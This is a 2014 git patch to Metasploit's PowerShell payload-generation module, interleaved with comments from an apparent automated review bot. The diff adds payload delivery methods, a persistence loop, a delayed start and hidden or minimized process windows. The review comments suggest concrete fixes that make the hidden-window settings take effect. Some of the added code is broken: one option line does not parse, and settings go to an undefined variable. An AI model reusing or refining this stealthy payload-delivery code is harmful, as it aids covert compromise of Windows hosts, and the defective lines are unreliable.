From 0056c260470815eeb2c629d506940fb49b7ef626 Mon Sep 17 00:00:00 2001
From: RageLtMan
Date: Wed, 12 Feb 2014 22:06:18 -0500
Subject: [PATCH] import msf exploit

---
 lib/msf/core/exploit/powershell.rb | 75 +++++++++++++++++++++---------
 1 file changed, 53 insertions(+), 22 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index e918e7fd4b..42ce1559ae 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -12,11 +12,17 @@ module Exploit::Powershell
 register_advanced_options(
 [
 OptBool.new('PSH::persist', [true, 'Run the payload in a loop', false]),
- OptBool.new('PSH::old_technique', [true, 'Use powershell 1.0', false]),
+ OptBool.new('PSH::prepend_sleep'), [false, 'Prepend seconds of sleep']),
 OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
 OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
 OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
 OptBool.new('PSH::sub_funcs', [false, 'Substitute function names', false]),
+ OptEnum.new('PSH::method', [true, 'Payload delivery method', 'reflection', [
+ 'net',
+ 'reflection',
+ 'old',
+ 'msil'
+ ]]),
 ], self.class)
 end
 
@@ -144,7 +150,7 @@ module Exploit::Powershell
 end
 
 # Shorten args if PSH 2.0+
- unless datastore['PSH::old_technique']
+ unless datastore['PSH::method'] == 'old'
 arg_string.gsub!(' -Command ', ' -c ')
 arg_string.gsub!(' -EncodedCommand ', ' -e ')
 arg_string.gsub!(' -ExecutionPolicy ', ' -ep ')
@@ -178,7 +184,7 @@ module Exploit::Powershell
 end
 
 # Old technique fails if powershell exits..
- arg_opts[:noexit] = true if datastore['PSH::old_technique']
+ arg_opts[:noexit] = true if datastore['PSH::method'] == 'old'
 
 ps_args = generate_psh_args(arg_opts)
 
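Review bot: The added `OptBool.new('PSH::prepend_sleep'), [false, 'Prepend seconds of sleep'])` line closes the `new(` call right after the option name, so the description array becomes a stray argument to the enclosing array literal and the file no longer parses. The option also holds a number of seconds, which the later hunk (@@ -239) coerces with `.to_i`; an OptBool yields a boolean or its string form, neither of which carries a seconds count, so an integer option is the right type: `OptInt.new('PSH::prepend_sleep', [false, 'Prepend seconds of sleep']),`. The method enclosing `register_advanced_options` starts outside the hunk.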
@@ -193,6 +199,9 @@ $s=New-Object System.Diagnostics.ProcessStartInfo
 $s.FileName=$b
 $s.Arguments='#{ps_args}'
 $s.UseShellExecute=$false
+$si.RedirectStandardOutput = $true
+$si.WindowStyle = 'Hidden'
+$si.CreateNoWindow = $True
 $p=[System.Diagnostics.Process]::Start($s)
 EOS
 process_start_info.gsub!("\n",';')
@@ -231,6 +240,17 @@ EOS
 psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
 end
 
+ psh_payload = case datastore['PSH::method']
+ when 'net'
+ Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
+ when 'reflection'
+ Msf::Util::EXE.to_win32pe_psh_reflection(framework, pay)
+ when 'old'
+ Msf::Util::EXE.to_win32pe_psh(framework, pay)
+ when 'msil'
+ raise "Not in framework anymore"
+ end
+
 # Run our payload in a while loop
 if datastore['PSH::persist']
 fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
@@ -239,6 +259,13 @@ EOS
 psh_payload = "function #{fun_name}{#{psh_payload}};"
 psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
 end
+ if datastore['PSH::prepend_sleep']
+ if datastore['PSH::prepend_sleep'].to_i > 0
+ psh_payload = "Start-Sleep -s #{datastore['PSH::prepend_sleep']};" << psh_payload
+ else
+ vprint_error('Sleep time must be greater than 0 seconds')
+ end
+ end
 
 compressed_payload = compress_script(psh_payload)
 encoded_payload = encode_script(psh_payload)
@@ -297,7 +324,7 @@ EOS
 if opts[:remove_comspec]
 command = psh_command
 else
- command = "%COMSPEC% /b /c #{psh_command}"
+ command = "%COMSPEC% /b /c start /min #{psh_command}"
 end
 
 vprint_status("Powershell command length: #{command.length}")
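Review bot: The three added lines assign to `$si`, but the ProcessStartInfo object built by the `$s=New-Object ...` line in the hunk header and passed to `Process::Start($s)` is `$s`, so the window and redirect settings land on an undefined variable and never take effect; they should read `$s.RedirectStandardOutput = $true`, `$s.WindowStyle = 'Hidden'`, `$s.CreateNoWindow = $True`. Separately, with `UseShellExecute=$false` a redirected stdout that nothing reads leaves the child's output in an unread pipe, which can block the child once the pipe buffer fills; unless the stream is consumed somewhere outside this hunk, the redirect line is better dropped. The heredoc starts before the hunk.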
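Review bot: The new `case datastore['PSH::method']` assignment overwrites the `psh_payload` that the `to_win32pe_psh_net` line just above it produced, so that earlier branch (its `if` begins before the hunk) is now dead work and should be removed rather than left to run once for nothing. The `'msil'` branch raises a bare `RuntimeError` for a value the option enum explicitly offers, and there is no `else`, so any other value would silently leave `psh_payload` nil; a typed error that names the option makes both failures explicit, e.g. `when 'msil' then raise ArgumentError, "PSH::method 'msil' is no longer supported"` and `else raise ArgumentError, "Unknown PSH::method #{datastore['PSH::method']}"`. The enclosing method starts and ends outside the hunk.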
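Review bot: The `"Start-Sleep -s #{datastore['PSH::prepend_sleep']};"` line interpolates the raw option string into the generated script although the guard only validated `.to_i > 0`; interpolating the coerced value, `sleep_secs = datastore['PSH::prepend_sleep'].to_i` and `psh_payload = "Start-Sleep -s #{sleep_secs};" << psh_payload`, guarantees the emitted script contains only a number. The `else` branch logs with `vprint_error`, so a mistyped value is ignored without any message unless VERBOSE is set; `print_error` or a raised error would surface it. The enclosing method starts and ends outside the hunk.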
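Review bot: Prefixing `start /min` changes behaviour for every caller that does not set `opts[:remove_comspec]`, and the intent is not recorded anywhere in the hunk; a comment above the assignment such as `# 'start /min' keeps the spawned console minimized; skipped when the caller drops %COMSPEC%` would help the next reader. Note also that `start` treats a leading double-quoted token as the window title, so if `psh_command` can begin with a quoted path (it is built outside this hunk) that token is consumed as the title; an explicit empty title, `"%COMSPEC% /b /c start /min \"\" #{psh_command}"`, avoids the ambiguity. The extra characters also count toward the length reported by the `vprint_status` line that follows.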
@@ -337,23 +364,24 @@ EOS
 return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
 end
 
- #
- # Convert binary to byte array, read from file if able
- #
- def build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
- code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
- code = code.unpack('C*')
- psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
- lines = []
- 1.upto(code.length-1) do |byte|
- if(byte % 10 == 0)
- lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
- else
- lines.push ",0x#{code[byte].to_s(16)}"
- end
- end
- psh << lines.join("") + "\r\n"
- end
+ #
+ # Convert binary to byte array, read from file if able
+ #
+ def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+ code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+ code = code.unpack('C*')
+ psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+ lines = []
+ 1.upto(code.length-1) do |byte|
+ if(byte % 10 == 0)
+ lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+ else
+ lines.push ",0x#{code[byte].to_s(16)}"
+ end
+ end
+
+ return psh << lines.join("") + "\r\n"
+ end
 
 #
 # Find PID of file locker
@@ -362,10 +390,13 @@ EOS
 return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#(unknown)"){$processVar.Name + " PID:" + $processVar.id}}}^
 end
 
-
+ #
+ # Return last time of login for each user
+ #
 def self.get_last_login(user)
 return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
 end
+
 end
 end
 end
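Review bot: `::File.read(input_data)` in the new `self.to_byte_array` opens the file in text mode, so on Windows hosts newline translation can alter the bytes before `unpack('C*')`; `::File.binread(input_data)` reads them unchanged. `code[0].to_s(16)` raises `NoMethodError` on empty input, and because the first argument serves as either a path or raw bytes, a blob that happens to name an existing file is read from disk instead; `raise ArgumentError, 'empty input' if code.empty?` covers the first case and the dual-purpose argument deserves a comment on the method. The rename from the instance method `build_byte_array` to the module method `self.to_byte_array` is a breaking interface change, and since this patch touches only this file, any existing callers of the old name would break — worth confirming before merge.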